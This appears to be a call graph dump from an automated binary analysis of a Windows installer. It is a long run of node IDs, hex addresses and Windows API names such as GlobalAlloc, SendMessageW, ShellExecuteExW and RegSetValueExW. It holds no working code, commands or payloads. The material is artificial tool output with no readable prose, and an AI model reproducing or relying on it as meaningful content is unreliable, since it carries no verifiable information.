WideCharToMultiByte 4655->4738 4656->4655 4656->4666 4657->4666 4734 735412cc 4657->4734 4659->4662 4660 73542126 4737 735412bb GlobalAlloc 4660->4737 4661 73542325 lstrlenW 4668 735416bd 4 API calls 4661->4668 4662->4648 4662->4650 4662->4653 4662->4654 4662->4659 4662->4660 4665 735421ae 4662->4665 4662->4666 4669 73542067 GlobalFree 4662->4669 4670 735412cc 2 API calls 4662->4670 4671 73541dcd 4662->4671 4665->4666 4672 73542216 lstrcpyW 4665->4672 4666->4605 4667 735422d8 4667->4661 4667->4666 4668->4666 4669->4662 4670->4662 4671->4662 4732 7354162f GlobalSize GlobalAlloc 4671->4732 4672->4666 4674 7354212f 4674->4605 4681 73542498 4675->4681 4677 735425c1 GlobalFree 4678 7354186f 4677->4678 4677->4681 4678->4615 4678->4616 4678->4620 4679 73542540 GlobalAlloc 4683 73542569 4679->4683 4680 7354256b GlobalAlloc CLSIDFromString 4680->4677 4681->4677 4681->4679 4681->4680 4682 735412cc GlobalAlloc lstrcpynW 4681->4682 4681->4683 4741 7354135a 4681->4741 4682->4681 4683->4677 4745 735427a4 4683->4745 4686 73542453 4685->4686 4687 7354245e GlobalAlloc 4686->4687 4688 73541868 4686->4688 4687->4686 4688->4608 4693 73542840 4689->4693 4690 735428ee 4692 735428f4 GlobalSize 4690->4692 4694 735428fe 4690->4694 4691 735428db GlobalAlloc 4691->4694 4692->4694 4693->4690 4693->4691 4694->4631 4696 73542e2e 4695->4696 4697 73542e6e GlobalFree 4696->4697 4748 735412bb GlobalAlloc 4698->4748 4700 735426d8 MultiByteToWideChar 4705 7354265f 4700->4705 4701 735426fa StringFromGUID2 4701->4705 4702 7354270b lstrcpynW 4702->4705 4703 7354271e wsprintfW 4703->4705 4704 73542742 GlobalFree 4704->4705 4705->4700 4705->4701 4705->4702 4705->4703 4705->4704 4706 73542777 GlobalFree 4705->4706 4707 73541312 2 API calls 4705->4707 4749 73541381 4705->4749 4706->4624 4707->4705 4753 735412bb GlobalAlloc 4709->4753 4711 73541659 4712 73541666 2 API calls 4711->4712 4713 73541663 4712->4713 4714 73541312 4713->4714 4715 73541355 GlobalFree 4714->4715 4716 7354131b GlobalAlloc lstrcpynW 4714->4716 4715->4628 4716->4715 4718 73541672 wsprintfW 4717->4718 4719 7354169f lstrcpyW 4717->4719 4722 735416b8 4718->4722 4719->4722 4722->4632 4724 73541931 4723->4724 4725 73542626 4723->4725 4724->4639 4724->4640 4725->4724 4726 73542642 GlobalFree 4725->4726 4726->4725 4728 73541312 2 API calls 4727->4728 4729 735415fe 4728->4729 4729->4634 4730->4646 4731->4662 4733 7354164d 4732->4733 4733->4671 4740 735412bb GlobalAlloc 4734->4740 4736 735412db lstrcpynW 4736->4666 4737->4674 4739 735416fd GlobalFree 4738->4739 4739->4667 4740->4736 4742 73541361 4741->4742 4743 735412cc 2 API calls 4742->4743 4744 7354137f 4743->4744 4744->4681 4746 735427b2 VirtualAlloc 4745->4746 4747 73542808 4745->4747 4746->4747 4747->4683 4748->4705 4750 735413ac 4749->4750 4751 7354138a 4749->4751 4750->4705 4751->4750 4752 73541390 lstrcpyW 4751->4752 4752->4750 4753->4711 5059 404658 5060 404670 5059->5060 5064 40478a 5059->5064 5065 404499 18 API calls 5060->5065 5061 4047f4 5062 4048be 5061->5062 5063 4047fe GetDlgItem 5061->5063 5070 404500 8 API calls 5062->5070 5066 404818 5063->5066 5067 40487f 5063->5067 5064->5061 5064->5062 5068 4047c5 GetDlgItem SendMessageW 5064->5068 5069 4046d7 5065->5069 5066->5067 5074 40483e SendMessageW LoadCursorW SetCursor 5066->5074 5067->5062 5071 404891 5067->5071 5092 4044bb KiUserCallbackDispatcher 5068->5092 5073 404499 18 API calls 5069->5073 5080 4048b9 5070->5080 5075 4048a7 5071->5075 5076 404897 SendMessageW 5071->5076 5078 4046e4 CheckDlgButton 5073->5078 5096 404907 5074->5096 5075->5080 5081 4048ad SendMessageW 5075->5081 5076->5075 5077 4047ef 5093 4048e3 5077->5093 5090 4044bb KiUserCallbackDispatcher 5078->5090 5081->5080 5085 404702 GetDlgItem 5091 4044ce SendMessageW 5085->5091 5087 404718 SendMessageW 5088 404735 GetSysColor 5087->5088 5089 40473e SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5087->5089 5088->5089 5089->5080 5090->5085 5091->5087 5092->5077 5094 4048f1 5093->5094 5095 4048f6 SendMessageW 5093->5095 5094->5095 5095->5061 5099 405b63 ShellExecuteExW 5096->5099 5098 40486d LoadCursorW SetCursor 5098->5067 5099->5098 5100 402b59 5101 402b60 5100->5101 5102 402bab 5100->5102 5105 402d84 17 API calls 5101->5105 5107 402ba9 5101->5107 5103 40690a 5 API calls 5102->5103 5104 402bb2 5103->5104 5106 402da6 17 API calls 5104->5106 5108 402b6e 5105->5108 5110 402bbb 5106->5110 5109 402d84 17 API calls 5108->5109 5113 402b7a 5109->5113 5110->5107 5111 402bbf IIDFromString 5110->5111 5111->5107 5112 402bce 5111->5112 5112->5107 5118 40653d lstrcpynW 5112->5118 5117 406484 wsprintfW 5113->5117 5115 402beb CoTaskMemFree 5115->5107 5117->5107 5118->5115 4873 40175c 4874 402da6 17 API calls 4873->4874 4875 401763 4874->4875 4876 40605c 2 API calls 4875->4876 4877 40176a 4876->4877 4878 40605c 2 API calls 4877->4878 4878->4877 5119 401d5d 5120 402d84 17 API calls 5119->5120 5121 401d6e SetWindowLongW 5120->5121 5122 402c2a 5121->5122 4879 401ede 4880 402d84 17 API calls 4879->4880 4881 401ee4 4880->4881 4882 402d84 17 API calls 4881->4882 4883 401ef0 4882->4883 4884 401f07 EnableWindow 4883->4884 4885 401efc ShowWindow 4883->4885 4886 402c2a 4884->4886 4885->4886 4887 4056de 4888 405888 4887->4888 4889 4056ff GetDlgItem GetDlgItem GetDlgItem 4887->4889 4891 405891 GetDlgItem CreateThread FindCloseChangeNotification 4888->4891 4892 4058b9 4888->4892 4933 4044ce SendMessageW 4889->4933 4891->4892 4936 405672 5 API calls 4891->4936 4894 4058e4 4892->4894 4895 4058d0 ShowWindow ShowWindow 4892->4895 4896 405909 4892->4896 4893 40576f 4899 405776 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4893->4899 4897 4058f0 4894->4897 4898 405944 4894->4898 4935 4044ce SendMessageW 4895->4935 4903 404500 8 API calls 4896->4903 4901 4058f8 4897->4901 4902 40591e ShowWindow 4897->4902 4898->4896 4906 405952 SendMessageW 4898->4906 4904 4057e4 4899->4904 4905 4057c8 SendMessageW SendMessageW 4899->4905 4907 404472 SendMessageW 4901->4907 4909 405930 4902->4909 4910 40593e 4902->4910 4908 405917 4903->4908 4913 4057f7 4904->4913 4914 4057e9 SendMessageW 4904->4914 4905->4904 4906->4908 4915 40596b CreatePopupMenu 4906->4915 4907->4896 4911 40559f 24 API calls 4909->4911 4912 404472 SendMessageW 4910->4912 4911->4910 4912->4898 4917 404499 18 API calls 4913->4917 4914->4913 4916 40657a 17 API calls 4915->4916 4918 40597b AppendMenuW 4916->4918 4919 405807 4917->4919 4920 405998 GetWindowRect 4918->4920 4921 4059ab TrackPopupMenu 4918->4921 4922 405810 ShowWindow 4919->4922 4923 405844 GetDlgItem SendMessageW 4919->4923 4920->4921 4921->4908 4925 4059c6 4921->4925 4926 405833 4922->4926 4927 405826 ShowWindow 4922->4927 4923->4908 4924 40586b SendMessageW SendMessageW 4923->4924 4924->4908 4928 4059e2 SendMessageW 4925->4928 4934 4044ce SendMessageW 4926->4934 4927->4926 4928->4928 4929 4059ff OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4928->4929 4931 405a24 SendMessageW 4929->4931 4931->4931 4932 405a4d GlobalUnlock SetClipboardData CloseClipboard 4931->4932 4932->4908 4933->4893 4934->4923 4935->4894 5123 4028de 5124 4028e6 5123->5124 5125 4028ea FindNextFileW 5124->5125 5128 4028fc 5124->5128 5126 402943 5125->5126 5125->5128 5129 40653d lstrcpynW 5126->5129 5129->5128 5130 73541774 5131 735417a3 5130->5131 5132 73541bff 20 API calls 5131->5132 5133 735417aa 5132->5133 5134 735417b1 5133->5134 5135 735417bd 5133->5135 5136 73541312 2 API calls 5134->5136 5137 735417e4 5135->5137 5138 735417c7 5135->5138 5141 735417bb 5136->5141 5139 7354180e 5137->5139 5140 735417ea 5137->5140 5142 735415dd 3 API calls 5138->5142 5144 735415dd 3 API calls 5139->5144 5143 73541654 3 API calls 5140->5143 5145 735417cc 5142->5145 5146 735417ef 5143->5146 5144->5141 5147 73541654 3 API calls 5145->5147 5148 73541312 2 API calls 5146->5148 5149 735417d2 5147->5149 5151 735417f5 GlobalFree 5148->5151 5150 73541312 2 API calls 5149->5150 5152 735417d8 GlobalFree 5150->5152 5151->5141 5153 73541809 GlobalFree 5151->5153 5152->5141 5153->5141 5154 404ce0 5155 404cf0 5154->5155 5156 404d0c 5154->5156 5165 405b81 GetDlgItemTextW 5155->5165 5158 404d12 SHGetPathFromIDListW 5156->5158 5159 404d3f 5156->5159 5161 404d29 SendMessageW 5158->5161 5162 404d22 5158->5162 5160 404cfd SendMessageW 5160->5156 5161->5159 5163 40140b 2 API calls 5162->5163 5163->5161 5165->5160 5166 401563 5167 402ba4 5166->5167 5170 406484 wsprintfW 5167->5170 5169 402ba9 5170->5169 5171 401968 5172 402d84 17 API calls 5171->5172 5173 40196f 5172->5173 5174 402d84 17 API calls 5173->5174 5175 40197c 5174->5175 5176 402da6 17 API calls 5175->5176 5177 401993 lstrlenW 5176->5177 5179 4019a4 5177->5179 5178 4019e5 5179->5178 5183 40653d lstrcpynW 5179->5183 5181 4019d5 5181->5178 5182 4019da lstrlenW 5181->5182 5182->5178 5183->5181 5184 40166a 5185 402da6 17 API calls 5184->5185 5186 401670 5185->5186 5187 406873 2 API calls 5186->5187 5188 401676 5187->5188 5189 402aeb 5190 402d84 17 API calls 5189->5190 5193 402af1 5190->5193 5191 40657a 17 API calls 5192 40292e 5191->5192 5193->5191 5193->5192 5194 4026ec 5195 402d84 17 API calls 5194->5195 5198 4026fb 5195->5198 5196 402838 5197 402745 ReadFile 5197->5196 5197->5198 5198->5196 5198->5197 5199 4060b0 ReadFile 5198->5199 5201 402785 MultiByteToWideChar 5198->5201 5202 40283a 5198->5202 5204 4027ab SetFilePointer MultiByteToWideChar 5198->5204 5205 40284b 5198->5205 5207 40610e SetFilePointer 5198->5207 5199->5198 5201->5198 5216 406484 wsprintfW 5202->5216 5204->5198 5205->5196 5206 40286c SetFilePointer 5205->5206 5206->5196 5208 40612a 5207->5208 5211 406142 5207->5211 5209 4060b0 ReadFile 5208->5209 5210 406136 5209->5210 5210->5211 5212 406173 SetFilePointer 5210->5212 5213 40614b SetFilePointer 5210->5213 5211->5198 5212->5211 5213->5212 5214 406156 5213->5214 5215 4060df WriteFile 5214->5215 5215->5211 5216->5196 5217 73541979 5218 7354199c 5217->5218 5219 735419d1 GlobalFree 5218->5219 5220 735419e3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5218->5220 5219->5220 5221 73541312 2 API calls 5220->5221 5222 73541b6e GlobalFree GlobalFree 5221->5222 4517 40176f 4518 402da6 17 API calls 4517->4518 4519 401776 4518->4519 4520 401796 4519->4520 4521 40179e 4519->4521 4556 40653d lstrcpynW 4520->4556 4557 40653d lstrcpynW 4521->4557 4524 40179c 4527 4067c4 5 API calls 4524->4527 4525 4017a9 4526 405e0c 3 API calls 4525->4526 4528 4017af lstrcatW 4526->4528 4530 4017bb 4527->4530 4528->4524 4529 406873 2 API calls 4529->4530 4530->4529 4531 406008 2 API calls 4530->4531 4533 4017cd CompareFileTime 4530->4533 4534 40188d 4530->4534 4538 40653d lstrcpynW 4530->4538 4542 40657a 17 API calls 4530->4542 4549 405b9d MessageBoxIndirectW 4530->4549 4554 401864 4530->4554 4555 40602d GetFileAttributesW CreateFileW 4530->4555 4531->4530 4533->4530 4535 40559f 24 API calls 4534->4535 4536 401897 4535->4536 4539 4032b4 31 API calls 4536->4539 4537 40559f 24 API calls 4552 401879 4537->4552 4538->4530 4540 4018aa 4539->4540 4541 4018be SetFileTime 4540->4541 4543 4018d0 FindCloseChangeNotification 4540->4543 4541->4543 4542->4530 4544 4018e1 4543->4544 4543->4552 4545 4018e6 4544->4545 4546 4018f9 4544->4546 4547 40657a 17 API calls 4545->4547 4548 40657a 17 API calls 4546->4548 4550 4018ee lstrcatW 4547->4550 4551 401901 4548->4551 4549->4530 4550->4551 4551->4552 4553 405b9d MessageBoxIndirectW 4551->4553 4553->4552 4554->4537 4554->4552 4555->4530 4556->4524 4557->4525 5223 401a72 5224 402d84 17 API calls 5223->5224 5225 401a7b 5224->5225 5226 402d84 17 API calls 5225->5226 5227 401a20 5226->5227 5228 401573 5229 401583 ShowWindow 5228->5229 5230 40158c 5228->5230 5229->5230 5231 40159a ShowWindow 5230->5231 5232 402c2a 5230->5232 5231->5232 5233 4023f4 5234 402da6 17 API calls 5233->5234 5235 402403 5234->5235 5236 402da6 17 API calls 5235->5236 5237 40240c 5236->5237 5238 402da6 17 API calls 5237->5238 5239 402416 GetPrivateProfileStringW 5238->5239 5240 4014f5 SetForegroundWindow 5241 402c2a 5240->5241 5242 735410e1 5248 73541111 5242->5248 5243 735412b0 GlobalFree 5244 735411d7 GlobalAlloc 5244->5248 5245 73541240 GlobalFree 5245->5248 5246 735412ab 5246->5243 5247 7354135a 2 API calls 5247->5248 5248->5243 5248->5244 5248->5245 5248->5246 5248->5247 5249 73541312 2 API calls 5248->5249 5250 7354129a GlobalFree 5248->5250 5251 7354116b GlobalAlloc 5248->5251 5252 73541381 lstrcpyW 5248->5252 5249->5248 5250->5248 5251->5248 5252->5248 5253 401ff6 5254 402da6 17 API calls 5253->5254 5255 401ffd 5254->5255 5256 406873 2 API calls 5255->5256 5257 402003 5256->5257 5259 402014 5257->5259 5260 406484 wsprintfW 5257->5260 5260->5259 5261 401b77 5262 402da6 17 API calls 5261->5262 5263 401b7e 5262->5263 5264 402d84 17 API calls 5263->5264 5265 401b87 wsprintfW 5264->5265 5266 402c2a 5265->5266 5267 40167b 5268 402da6 17 API calls 5267->5268 5269 401682 5268->5269 5270 402da6 17 API calls 5269->5270 5271 40168b 5270->5271 5272 402da6 17 API calls 5271->5272 5273 401694 MoveFileW 5272->5273 5274 4016a7 5273->5274 5280 4016a0 5273->5280 5275 406873 2 API calls 5274->5275 5278 4022f6 5274->5278 5277 4016b6 5275->5277 5276 401423 24 API calls 5276->5278 5277->5278 5279 4062fd 36 API calls 5277->5279 5279->5280 5280->5276 5281 735423e9 5282 73542453 5281->5282 5283 7354245e GlobalAlloc 5282->5283 5284 7354247d 5282->5284 5283->5282 5285 4022ff 5286 402da6 17 API calls 5285->5286 5287 402305 5286->5287 5288 402da6 17 API calls 5287->5288 5289 40230e 5288->5289 5290 402da6 17 API calls 5289->5290 5291 402317 5290->5291 5292 406873 2 API calls 5291->5292 5293 402320 5292->5293 5294 402331 lstrlenW lstrlenW 5293->5294 5295 402324 5293->5295 5297 40559f 24 API calls 5294->5297 5296 40559f 24 API calls 5295->5296 5299 40232c 5295->5299 5296->5299 5298 40236f SHFileOperationW 5297->5298 5298->5295 5298->5299 5300 4019ff 5301 402da6 17 API calls 5300->5301 5302 401a06 5301->5302 5303 402da6 17 API calls 5302->5303 5304 401a0f 5303->5304 5305 401a16 lstrcmpiW 5304->5305 5306 401a28 lstrcmpW 5304->5306 5307 401a1c 5305->5307 5306->5307 5308 401000 5309 401037 BeginPaint GetClientRect 5308->5309 5310 40100c DefWindowProcW 5308->5310 5312 4010f3 5309->5312 5313 401179 5310->5313 5314 401073 CreateBrushIndirect FillRect DeleteObject 5312->5314 5315 4010fc 5312->5315 5314->5312 5316 401102 CreateFontIndirectW 5315->5316 5317 401167 EndPaint 5315->5317 5316->5317 5318 401112 6 API calls 5316->5318 5317->5313 5318->5317 5319 401d81 5320 401d94 GetDlgItem 5319->5320 5321 401d87 5319->5321 5322 401d8e 5320->5322 5323 402d84 17 API calls 5321->5323 5324 401dd5 GetClientRect LoadImageW SendMessageW 5322->5324 5325 402da6 17 API calls 5322->5325 5323->5322 5327 401e33 5324->5327 5329 401e3f 5324->5329 5325->5324 5328 401e38 DeleteObject 5327->5328 5327->5329 5328->5329 5330 401503 5331 40150b 5330->5331 5333 40151e 5330->5333 5332 402d84 17 API calls 5331->5332 5332->5333 5334 402383 5335 40238a 5334->5335 5338 40239d 5334->5338 5336 40657a 17 API calls 5335->5336 5337 402397 5336->5337 5337->5338 5339 405b9d MessageBoxIndirectW 5337->5339 5339->5338 5340 402c05 SendMessageW 5341 402c2a 5340->5341 5342 402c1f InvalidateRect 5340->5342 5342->5341 5343 404f06 GetDlgItem GetDlgItem 5344 404f58 7 API calls 5343->5344 5350 40517d 5343->5350 5345 404ff2 SendMessageW 5344->5345 5346 404fff DeleteObject 5344->5346 5345->5346 5347 405008 5346->5347 5348 40503f 5347->5348 5351 40657a 17 API calls 5347->5351 5352 404499 18 API calls 5348->5352 5349 40525f 5353 40530b 5349->5353 5362 4052b8 SendMessageW 5349->5362 5385 405170 5349->5385 5350->5349 5386 4051ec 5350->5386 5397 404e54 SendMessageW 5350->5397 5356 405021 SendMessageW SendMessageW 5351->5356 5357 405053 5352->5357 5354 405315 SendMessageW 5353->5354 5355 40531d 5353->5355 5354->5355 5364 405336 5355->5364 5365 40532f ImageList_Destroy 5355->5365 5380 405346 5355->5380 5356->5347 5361 404499 18 API calls 5357->5361 5358 405251 SendMessageW 5358->5349 5359 404500 8 API calls 5363 40550c 5359->5363 5366 405064 5361->5366 5368 4052cd SendMessageW 5362->5368 5362->5385 5369 40533f GlobalFree 5364->5369 5364->5380 5365->5364 5370 40513f GetWindowLongW SetWindowLongW 5366->5370 5376 40513a 5366->5376 5379 4050b7 SendMessageW 5366->5379 5382 4050f5 SendMessageW 5366->5382 5383 405109 SendMessageW 5366->5383 5367 4054c0 5373 4054d2 ShowWindow GetDlgItem ShowWindow 5367->5373 5367->5385 5371 4052e0 5368->5371 5369->5380 5372 405158 5370->5372 5381 4052f1 SendMessageW 5371->5381 5374 405175 5372->5374 5375 40515d ShowWindow 5372->5375 5373->5385 5396 4044ce SendMessageW 5374->5396 5395 4044ce SendMessageW 5375->5395 5376->5370 5376->5372 5379->5366 5380->5367 5388 405381 5380->5388 5402 404ed4 5380->5402 5381->5353 5382->5366 5383->5366 5385->5359 5386->5349 5386->5358 5387 40548b 5389 405496 InvalidateRect 5387->5389 5392 4054a2 5387->5392 5390 4053af SendMessageW 5388->5390 5391 4053c5 5388->5391 5389->5392 5390->5391 5391->5387 5393 405439 SendMessageW SendMessageW 5391->5393 5392->5367 5411 404e0f 5392->5411 5393->5391 5395->5385 5396->5350 5398 404eb3 SendMessageW 5397->5398 5399 404e77 GetMessagePos ScreenToClient SendMessageW 5397->5399 5401 404eab 5398->5401 5400 404eb0 5399->5400 5399->5401 5400->5398 5401->5386 5414 40653d lstrcpynW 5402->5414 5404 404ee7 5415 406484 wsprintfW 5404->5415 5406 404ef1 5407 40140b 2 API calls 5406->5407 5408 404efa 5407->5408 5416 40653d lstrcpynW 5408->5416 5410 404f01 5410->5388 5417 404d46 5411->5417 5413 404e24 5413->5367 5414->5404 5415->5406 5416->5410 5418 404d5f 5417->5418 5419 40657a 17 API calls 5418->5419 5420 404dc3 5419->5420 5421 40657a 17 API calls 5420->5421 5422 404dce 5421->5422 5423 40657a 17 API calls 5422->5423 5424 404de4 lstrlenW wsprintfW SetDlgItemTextW 5423->5424 5424->5413 5425 404609 lstrlenW 5426 404628 5425->5426 5427 40462a WideCharToMultiByte 5425->5427 5426->5427 4173 40248a 4174 402da6 17 API calls 4173->4174 4175 40249c 4174->4175 4176 402da6 17 API calls 4175->4176 4177 4024a6 4176->4177 4190 402e36 4177->4190 4180 402c2a 4181 4024de 4182 4024ea 4181->4182 4214 402d84 4181->4214 4185 402509 RegSetValueExW 4182->4185 4194 4032b4 4182->4194 4183 402da6 17 API calls 4186 4024d4 lstrlenW 4183->4186 4188 40251f RegCloseKey 4185->4188 4186->4181 4188->4180 4191 402e51 4190->4191 4217 4063d8 4191->4217 4195 4032cd 4194->4195 4196 4032fb 4195->4196 4224 4034e5 SetFilePointer 4195->4224 4221 4034cf 4196->4221 4200 403468 4203 4034aa 4200->4203 4206 40346c 4200->4206 4201 403318 GetTickCount 4202 403452 4201->4202 4210 403367 4201->4210 4202->4185 4205 4034cf ReadFile 4203->4205 4204 4034cf ReadFile 4204->4210 4205->4202 4206->4202 4207 4034cf ReadFile 4206->4207 4208 4060df WriteFile 4206->4208 4207->4206 4208->4206 4209 4033bd GetTickCount 4209->4210 4210->4202 4210->4204 4210->4209 4211 4033e2 MulDiv wsprintfW 4210->4211 4213 4060df WriteFile 4210->4213 4212 40559f 24 API calls 4211->4212 4212->4210 4213->4210 4215 40657a 17 API calls 4214->4215 4216 402d99 4215->4216 4216->4182 4218 4063e7 4217->4218 4219 4063f2 RegCreateKeyExW 4218->4219 4220 4024b6 4218->4220 4219->4220 4220->4180 4220->4181 4220->4183 4222 4060b0 ReadFile 4221->4222 4223 403306 4222->4223 4223->4200 4223->4201 4223->4202 4224->4196 5428 40498a 5429 4049b6 5428->5429 5430 4049c7 5428->5430 5489 405b81 GetDlgItemTextW 5429->5489 5431 4049d3 GetDlgItem 5430->5431 5438 404a32 5430->5438 5433 4049e7 5431->5433 5437 4049fb SetWindowTextW 5433->5437 5442 405eb7 4 API calls 5433->5442 5434 404b16 5439 404cc5 5434->5439 5491 405b81 GetDlgItemTextW 5434->5491 5435 4049c1 5436 4067c4 5 API calls 5435->5436 5436->5430 5443 404499 18 API calls 5437->5443 5438->5434 5438->5439 5444 40657a 17 API calls 5438->5444 5441 404500 8 API calls 5439->5441 5446 404cd9 5441->5446 5447 4049f1 5442->5447 5448 404a17 5443->5448 5449 404aa6 SHBrowseForFolderW 5444->5449 5445 404b46 5450 405f14 18 API calls 5445->5450 5447->5437 5454 405e0c 3 API calls 5447->5454 5451 404499 18 API calls 5448->5451 5449->5434 5452 404abe CoTaskMemFree 5449->5452 5453 404b4c 5450->5453 5455 404a25 5451->5455 5456 405e0c 3 API calls 5452->5456 5492 40653d lstrcpynW 5453->5492 5454->5437 5490 4044ce SendMessageW 5455->5490 5458 404acb 5456->5458 5461 404b02 SetDlgItemTextW 5458->5461 5465 40657a 17 API calls 5458->5465 5460 404a2b 5464 40690a 5 API calls 5460->5464 5461->5434 5462 404b63 5463 40690a 5 API calls 5462->5463 5471 404b6a 5463->5471 5464->5438 5466 404aea lstrcmpiW 5465->5466 5466->5461 5468 404afb lstrcatW 5466->5468 5467 404bab 5493 40653d lstrcpynW 5467->5493 5468->5461 5470 404bb2 5472 405eb7 4 API calls 5470->5472 5471->5467 5476 405e58 2 API calls 5471->5476 5477 404c03 5471->5477 5473 404bb8 GetDiskFreeSpaceW 5472->5473 5475 404bdc MulDiv 5473->5475 5473->5477 5475->5477 5476->5471 5478 404c74 5477->5478 5480 404e0f 20 API calls 5477->5480 5479 404c97 5478->5479 5481 40140b 2 API calls 5478->5481 5494 4044bb KiUserCallbackDispatcher 5479->5494 5482 404c61 5480->5482 5481->5479 5483 404c76 SetDlgItemTextW 5482->5483 5484 404c66 5482->5484 5483->5478 5486 404d46 20 API calls 5484->5486 5486->5478 5487 404cb3 5487->5439 5488 4048e3 SendMessageW 5487->5488 5488->5439 5489->5435 5490->5460 5491->5445 5492->5462 5493->5470 5494->5487 4242 40290b 4243 402da6 17 API calls 4242->4243 4244 402912 FindFirstFileW 4243->4244 4245 40293a 4244->4245 4249 402925 4244->4249 4246 402943 4245->4246 4250 406484 wsprintfW 4245->4250 4251 40653d lstrcpynW 4246->4251 4250->4246 4251->4249 5495 40190c 5496 401943 5495->5496 5497 402da6 17 API calls 5496->5497 5498 401948 5497->5498 5499 405c49 67 API calls 5498->5499 5500 401951 5499->5500 5501 40190f 5502 402da6 17 API calls 5501->5502 5503 401916 5502->5503 5504 405b9d MessageBoxIndirectW 5503->5504 5505 40191f 5504->5505 5506 401491 5507 40559f 24 API calls 5506->5507 5508 401498 5507->5508 5509 402891 5510 402898 5509->5510 5512 402ba9 5509->5512 5511 402d84 17 API calls 5510->5511 5513 40289f 5511->5513 5514 4028ae SetFilePointer 5513->5514 5514->5512 5515 4028be 5514->5515 5517 406484 wsprintfW 5515->5517 5517->5512 5518 401f12 5519 402da6 17 API calls 5518->5519 5520 401f18 5519->5520 5521 402da6 17 API calls 5520->5521 5522 401f21 5521->5522 5523 402da6 17 API calls 5522->5523 5524 401f2a 5523->5524 5525 402da6 17 API calls 5524->5525 5526 401f33 5525->5526 5527 401423 24 API calls 5526->5527 5528 401f3a 5527->5528 5535 405b63 ShellExecuteExW 5528->5535 5530 401f82 5533 40292e 5530->5533 5536 4069b5 WaitForSingleObject 5530->5536 5532 401f9f CloseHandle 5532->5533 5535->5530 5538 4069cf 5536->5538 5537 4069e1 GetExitCodeProcess 5537->5532 5538->5537 5539 406946 2 API calls 5538->5539 5540 4069d6 WaitForSingleObject 5539->5540 5540->5538 5541 405513 5542 405523 5541->5542 5543 405537 5541->5543 5544 405529 5542->5544 5553 405580 5542->5553 5545 40553f IsWindowVisible 5543->5545 5551 405556 5543->5551 5547 4044e5 SendMessageW 5544->5547 5548 40554c 5545->5548 5545->5553 5546 405585 CallWindowProcW 5549 405533 5546->5549 5547->5549 5550 404e54 5 API calls 5548->5550 5550->5551 5551->5546 5552 404ed4 4 API calls 5551->5552 5552->5553 5553->5546 5554 402f93 5555 402fa5 SetTimer 5554->5555 5556 402fbe 5554->5556 5555->5556 5557 403013 5556->5557 5558 402fd8 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5556->5558 5558->5557 5559 73541000 5562 7354101b 5559->5562 5563 735415b6 GlobalFree 5562->5563 5564 73541020 5563->5564 5565 73541024 5564->5565 5566 73541027 GlobalAlloc 5564->5566 5567 735415dd 3 API calls 5565->5567 5566->5565 5568 73541019 5567->5568 5569 401d17 5570 402d84 17 API calls 5569->5570 5571 401d1d IsWindow 5570->5571 5572 401a20 5571->5572 5573 7354170d 5574 735415b6 GlobalFree 5573->5574 5577 73541725 5574->5577 5575 7354176b GlobalFree 5576 73541740 5576->5575 5577->5575 5577->5576 5578 73541757 VirtualFree 5577->5578 5578->5575 4754 403f9a 4755 403fb2 4754->4755 4756 404113 4754->4756 4755->4756 4759 403fbe 4755->4759 4757 404164 4756->4757 4758 404124 GetDlgItem GetDlgItem 4756->4758 4761 4041be 4757->4761 4773 401389 2 API calls 4757->4773 4827 404499 4758->4827 4762 403fc9 SetWindowPos 4759->4762 4763 403fdc 4759->4763 4767 4044e5 SendMessageW 4761->4767 4779 40410e 4761->4779 4762->4763 4764 403fe5 ShowWindow 4763->4764 4765 404027 4763->4765 4768 404100 4764->4768 4769 404005 GetWindowLongW 4764->4769 4770 404046 4765->4770 4771 40402f DestroyWindow 4765->4771 4766 40414e KiUserCallbackDispatcher 4772 40140b 2 API calls 4766->4772 4796 4041d0 4767->4796 4836 404500 4768->4836 4769->4768 4774 40401e ShowWindow 4769->4774 4775 40404b SetWindowLongW 4770->4775 4776 40405c 4770->4776 4826 404422 4771->4826 4772->4757 4777 404196 4773->4777 4774->4765 4775->4779 4776->4768 4782 404068 GetDlgItem 4776->4782 4777->4761 4783 40419a SendMessageW 4777->4783 4780 40140b 2 API calls 4780->4796 4781 404424 DestroyWindow EndDialog 4781->4826 4785 404096 4782->4785 4786 404079 SendMessageW IsWindowEnabled 4782->4786 4783->4779 4784 404453 ShowWindow 4784->4779 4788 4040a3 4785->4788 4789 4040b6 4785->4789 4790 4040ea SendMessageW 4785->4790 4799 40409b 4785->4799 4786->4779 4786->4785 4787 40657a 17 API calls 4787->4796 4788->4790 4788->4799 4793 4040d3 4789->4793 4794 4040be 4789->4794 4790->4768 4792 404499 18 API calls 4792->4796 4798 40140b 2 API calls 4793->4798 4797 40140b 2 API calls 4794->4797 4795 4040d1 4795->4768 4796->4779 4796->4780 4796->4781 4796->4787 4796->4792 4801 404499 18 API calls 4796->4801 4817 404364 DestroyWindow 4796->4817 4797->4799 4800 4040da 4798->4800 4833 404472 4799->4833 4800->4768 4800->4799 4802 40424b GetDlgItem 4801->4802 4803 404260 4802->4803 4804 404268 ShowWindow KiUserCallbackDispatcher 4802->4804 4803->4804 4830 4044bb KiUserCallbackDispatcher 4804->4830 4806 404292 EnableWindow 4811 4042a6 4806->4811 4807 4042ab GetSystemMenu EnableMenuItem SendMessageW 4808 4042db SendMessageW 4807->4808 4807->4811 4808->4811 4810 403f7b 18 API calls 4810->4811 4811->4807 4811->4810 4831 4044ce SendMessageW 4811->4831 4832 40653d lstrcpynW 4811->4832 4813 40430a lstrlenW 4814 40657a 17 API calls 4813->4814 4815 404320 SetWindowTextW 4814->4815 4816 401389 2 API calls 4815->4816 4816->4796 4818 40437e CreateDialogParamW 4817->4818 4817->4826 4819 4043b1 4818->4819 4818->4826 4820 404499 18 API calls 4819->4820 4821 4043bc GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4820->4821 4822 401389 2 API calls 4821->4822 4823 404402 4822->4823 4823->4779 4824 40440a ShowWindow 4823->4824 4825 4044e5 SendMessageW 4824->4825 4825->4826 4826->4779 4826->4784 4828 40657a 17 API calls 4827->4828 4829 4044a4 SetDlgItemTextW 4828->4829 4829->4766 4830->4806 4831->4811 4832->4813 4834 404479 4833->4834 4835 40447f SendMessageW 4833->4835 4834->4835 4835->4795 4837 404518 GetWindowLongW 4836->4837 4838 4045c3 4836->4838 4837->4838 4839 40452d 4837->4839 4838->4779 4839->4838 4840 40455a GetSysColor 4839->4840 4841 40455d 4839->4841 4840->4841 4842 404563 SetTextColor 